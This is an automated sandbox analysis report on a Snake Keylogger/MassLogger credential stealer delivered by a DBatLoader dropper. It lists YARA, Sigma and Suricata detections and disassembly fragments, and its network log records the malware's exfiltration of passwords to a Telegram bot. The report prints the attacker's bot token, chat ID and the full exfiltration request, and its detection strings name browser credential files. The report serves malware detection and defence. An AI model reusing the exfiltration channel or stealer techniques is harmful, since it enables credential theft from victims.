7.2.dajivhqI.pif.2b34e390.9.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1a8b4:$a1: get_encryptedPassword 0x1a888:$a2: get_encryptedUsername 0x1a94c:$a3: get_timePasswordChanged 0x1a864:$a4: get_passwordField 0x1a8ca:$a5: set_encryptedPassword 0x1a697:$a7: get_logins 0x19c21:$a8: GetOutlookPasswords 0x19135:$a9: StartKeylogger 0x17b8f:$a10: KeyLoggerEventArgs 0x17b5e:$a11: KeyLoggerEventArgsEventHandler 0x1a76b:$a13: _encryptedPassword
7.2.dajivhqI.pif.2b34e390.9.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1efaf:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e4ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x1e7bb:$a4: \Orbitum\User Data\Default\Login Data 0x1f5b3:$a5: \Kometa\User Data\Default\Login Data
7.2.dajivhqI.pif.2a160000.7.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.dajivhqI.pif.2a160000.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.dajivhqI.pif.2a160000.7.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
7.2.dajivhqI.pif.2a160000.7.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.dajivhqI.pif.2a160000.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.dajivhqI.pif.2a160000.7.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1a8b4:$a1: get_encryptedPassword 0x1a888:$a2: get_encryptedUsername 0x1a94c:$a3: get_timePasswordChanged 0x1a864:$a4: get_passwordField 0x1a8ca:$a5: set_encryptedPassword 0x1a697:$a7: get_logins 0x19c21:$a8: GetOutlookPasswords 0x19135:$a9: StartKeylogger 0x17b8f:$a10: KeyLoggerEventArgs 0x17b5e:$a11: KeyLoggerEventArgsEventHandler 0x1a76b:$a13: _encryptedPassword
7.2.dajivhqI.pif.2a160000.7.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1efaf:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e4ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x1e7bb:$a4: \Orbitum\User Data\Default\Login Data 0x1f5b3:$a5: \Kometa\User Data\Default\Login Data
7.2.dajivhqI.pif.2b34e390.9.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.dajivhqI.pif.2b34e390.9.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.dajivhqI.pif.2b34e390.9.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
7.2.dajivhqI.pif.2b34e390.9.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.dajivhqI.pif.2b34e390.9.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.dajivhqI.pif.2b34e390.9.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c6b4:$a1: get_encryptedPassword 0x1c688:$a2: get_encryptedUsername 0x1c74c:$a3: get_timePasswordChanged 0x1c664:$a4: get_passwordField 0x1c6ca:$a5: set_encryptedPassword 0x1c497:$a7: get_logins 0x1ba21:$a8: GetOutlookPasswords 0x1af35:$a9: StartKeylogger 0x1998f:$a10: KeyLoggerEventArgs 0x1995e:$a11: KeyLoggerEventArgsEventHandler 0x1c56b:$a13: _encryptedPassword
7.2.dajivhqI.pif.2b34e390.9.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20daf:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x202ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x205bb:$a4: \Orbitum\User Data\Default\Login Data 0x213b3:$a5: \Kometa\User Data\Default\Login Data
0.2.y79a2l1FY5.exe.29c0000.4.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
7.2.dajivhqI.pif.2b325570.8.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.dajivhqI.pif.2b325570.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.dajivhqI.pif.2b325570.8.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
7.2.dajivhqI.pif.2b325570.8.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.dajivhqI.pif.2b325570.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.dajivhqI.pif.2b325570.8.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1d59c:$a1: get_encryptedPassword 0x454d4:$a1: get_encryptedPassword 0x1d570:$a2: get_encryptedUsername 0x454a8:$a2: get_encryptedUsername 0x1d634:$a3: get_timePasswordChanged 0x4556c:$a3: get_timePasswordChanged 0x1d54c:$a4: get_passwordField 0x45484:$a4: get_passwordField 0x1d5b2:$a5: set_encryptedPassword 0x454ea:$a5: set_encryptedPassword 0x1d37f:$a7: get_logins 0x452b7:$a7: get_logins 0x1c909:$a8: GetOutlookPasswords 0x44841:$a8: GetOutlookPasswords 0x1be1d:$a9: StartKeylogger 0x43d55:$a9: StartKeylogger 0x1a877:$a10: KeyLoggerEventArgs 0x427af:$a10: KeyLoggerEventArgs 0x1a846:$a11: KeyLoggerEventArgsEventHandler 0x4277e:$a11: KeyLoggerEventArgsEventHandler 0x1d453:$a13: _encryptedPassword
7.2.dajivhqI.pif.2b325570.8.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x21c97:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49bcf:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21195:$a3: \Google\Chrome\User Data\Default\Login Data 0x490cd:$a3: \Google\Chrome\User Data\Default\Login Data 0x214a3:$a4: \Orbitum\User Data\Default\Login Data 0x493db:$a4: \Orbitum\User Data\Default\Login Data 0x2229b:$a5: \Kometa\User Data\Default\Login Data 0x4a1d3:$a5: \Kometa\User Data\Default\Login Data
0.2.y79a2l1FY5.exe.23ce118.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
Click to see the 137 entries

Sigma Signatures

System Summary

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Source: File created

Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\y79a2l1FY5.exe, ProcessId: 6664, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\\Users\\user\\Links\dajivhqI.pif, CommandLine: C:\\Users\\user\\Links\dajivhqI.pif, CommandLine|base64offset|contains: , Image: C:\Users\user\Links\dajivhqI.pif, NewProcessName: C:\Users\user\Links\dajivhqI.pif, OriginalFileName: C:\Users\user\Links\dajivhqI.pif, ParentCommandLine: "C:\Users\user\Desktop\y79a2l1FY5.exe", ParentImage: C:\Users\user\Desktop\y79a2l1FY5.exe, ParentProcessId: 6664, ParentProcessName: y79a2l1FY5.exe, ProcessCommandLine: C:\\Users\\user\\Links\dajivhqI.pif, ProcessId: 6164, ProcessName: dajivhqI.pif

Suricata Signatures

ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T08:09:02.699128+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.8	49684	149.154.167.220	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T08:08:51.265993+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49682	193.122.130.0	80	TCP
2025-03-13T08:08:59.453405+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49682	193.122.130.0	80	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T08:09:01.348691+0100	1810008	1	Potentially Bad Traffic	192.168.2.8	49684	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: y79a2l1FY5.exe

Avira: detected

Found malware configuration

Source: 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7653831104:AAGSRFQyeJurjKPP8kGFOQU_KT_ipaVGGFM", "Telegram Chatid": "6306897853"}
Source: dajivhqI.pif.6164.7.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7653831104:AAGSRFQyeJurjKPP8kGFOQU_KT_ipaVGGFM/sendMessage"}

Multi AV Scanner detection for submitted file

Source: y79a2l1FY5.exe	Virustotal: Detection: 58%			Perma Link
Source: y79a2l1FY5.exe	ReversingLabs: Detection: 63%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Links\dajivhqI.pif

Unpacked PE file: 7.2.dajivhqI.pif.400000.2.unpack

Source: y79a2l1FY5.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown

HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49683 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49684 version: TLS 1.2

Source:	Binary string: easinvoker.pdb source: y79a2l1FY5.exe, 00000000.00000002.883646315.0000000002860000.00000004.00001000.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000003.877707933.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: dajivhqI.pif, 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, dajivhqI.pif, 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: y79a2l1FY5.exe, 00000000.00000002.883646315.0000000002860000.00000004.00001000.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000003.877707933.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000003.878633103.0000000000849000.00000004.00000020.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000003.878633103.0000000000872000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\y79a2l1FY5.exe

Code function: 0_2_029C52F8 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_029C52F8

Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	7_2_29DCE188
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2A1C4541h	7_2_2A1C4290
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2A1C4C97h	7_2_2A1C4878
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2A1C4C97h	7_2_2A1C4BC4
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2A1C4C97h	7_2_2A1C486A
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2A1CF3D9h	7_2_2A1CF130
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2A1CFC89h	7_2_2A1CF9E0
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2A1CEF81h	7_2_2A1CECD8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2A1CF831h	7_2_2A1CF588
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAFE878h	7_2_2DAFE5D0
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAF07D5h	7_2_2DAF0498
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAF02E9h	7_2_2DAF0040
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAF9060h	7_2_2DAF8DB8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAFC028h	7_2_2DAFBD80
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAFC480h	7_2_2DAFC1D8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAFBBD0h	7_2_2DAFB928
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAFDFC8h	7_2_2DAFDD20
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAFE420h	7_2_2DAFE178
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAFDB70h	7_2_2DAFD8C8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAFB778h	7_2_2DAFB4D0
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAFAEC8h	7_2_2DAFAC20
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAFD2C0h	7_2_2DAFD018
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAFB320h	7_2_2DAFB078
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAFD718h	7_2_2DAFD470
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAF32F0h	7_2_2DAF3048
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAF2A40h	7_2_2DAF2798
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAF2E98h	7_2_2DAF2BF0
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAFAA70h	7_2_2DAFA7C8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAFCE68h	7_2_2DAFCBC0
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAFA1C0h	7_2_2DAF9F18
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAFA618h	7_2_2DAFA370
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAF25E8h	7_2_2DAF2340
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAFF128h	7_2_2DAFEE80
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAF1D38h	7_2_2DAF1A90
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAF2190h	7_2_2DAF1EE8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAF9D68h	7_2_2DAF9AC0
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAFF580h	7_2_2DAFF2D8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAFECD0h	7_2_2DAFEA28
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAFC8DAh	7_2_2DAFC630
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAF94B8h	7_2_2DAF9210
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAF9910h	7_2_2DAF9668
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAF131Ah	7_2_2DAF1268
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DAF131Ah	7_2_2DAF1270
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DB80D0Dh	7_2_2DB80B30
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then jmp 2DB81697h	7_2_2DB80B30
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then push 00000000h	7_2_2DB84040
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_2DB80040
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	7_2_2E1A1C24
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	7_2_2E1A5880

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49684 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49684 -> 149.154.167.220:443

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7653831104:AAGSRFQyeJurjKPP8kGFOQU_KT_ipaVGGFM/sendDocument?chat_id=6306897853&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd61dc65d6e19cHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic

Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49682 -> 193.122.130.0:80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown

HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49683 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7653831104:AAGSRFQyeJurjKPP8kGFOQU_KT_ipaVGGFM/sendDocument?chat_id=6306897853&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd61dc65d6e19cHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive

Source: dajivhqI.pif, 00000007.00000002.3370141662.000000002A4E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: dajivhqI.pif, 00000007.00000002.3370141662.000000002A40C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: dajivhqI.pif, 00000007.00000002.3370141662.000000002A4E1000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3370141662.000000002A400000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3370141662.000000002A40C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: dajivhqI.pif, 00000007.00000002.3370141662.000000002A38B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: dajivhqI.pif, 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, dajivhqI.pif, 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: dajivhqI.pif, 00000007.00000002.3370141662.000000002A428000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: dajivhqI.pif, 00000007.00000002.3370141662.000000002A38B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: y79a2l1FY5.exe, 00000000.00000002.883646315.0000000002860000.00000004.00001000.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000002.913174273.0000000020FB0000.00000004.00000020.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000003.880472759.0000000000852000.00000004.00000020.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000003.878119908.000000007EBC0000.00000004.00001000.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000003.878119908.000000007EC06000.00000004.00001000.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000002.913261690.00000000210D9000.00000004.00001000.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000003.877707933.000000007ED16000.00000004.00001000.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000000.881059717.0000000000416000.00000002.00000001.01000000.00000005.sdmp, dajivhqI.pif.0.dr	String found in binary or memory: http://www.pmail.com
Source: dajivhqI.pif, 00000007.00000002.3370141662.000000002A4E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: dajivhqI.pif, 00000007.00000002.3370141662.000000002A4E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: dajivhqI.pif, 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, dajivhqI.pif, 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: dajivhqI.pif, 00000007.00000002.3370141662.000000002A4E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7653831104:AAGSRFQyeJurjKPP8kGFOQU_KT_ipaVGGFM/sendDocument?chat_id=6306
Source: dajivhqI.pif, 00000007.00000002.3370141662.000000002A40C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: dajivhqI.pif, 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, dajivhqI.pif, 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3370141662.000000002A40C000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: dajivhqI.pif, 00000007.00000002.3370141662.000000002A40C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49684 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49684 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, UltraSpeed.cs

.Net Code: VKCodeToUnicode

Source: Yara match

File source: Process Memory Space: y79a2l1FY5.exe PID: 6664, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 7.1.dajivhqI.pif.46b268.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.dajivhqI.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.1.dajivhqI.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.dajivhqI.pif.438038.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.dajivhqI.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.y79a2l1FY5.exe.212c9ba8.7.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.1.dajivhqI.pif.438038.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.y79a2l1FY5.exe.212c9ba8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.dajivhqI.pif.46b268.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.1.dajivhqI.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.dajivhqI.pif.2b326458.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.dajivhqI.pif.2b326458.10.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.dajivhqI.pif.438038.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.dajivhqI.pif.2a0c0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.dajivhqI.pif.2a0c0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
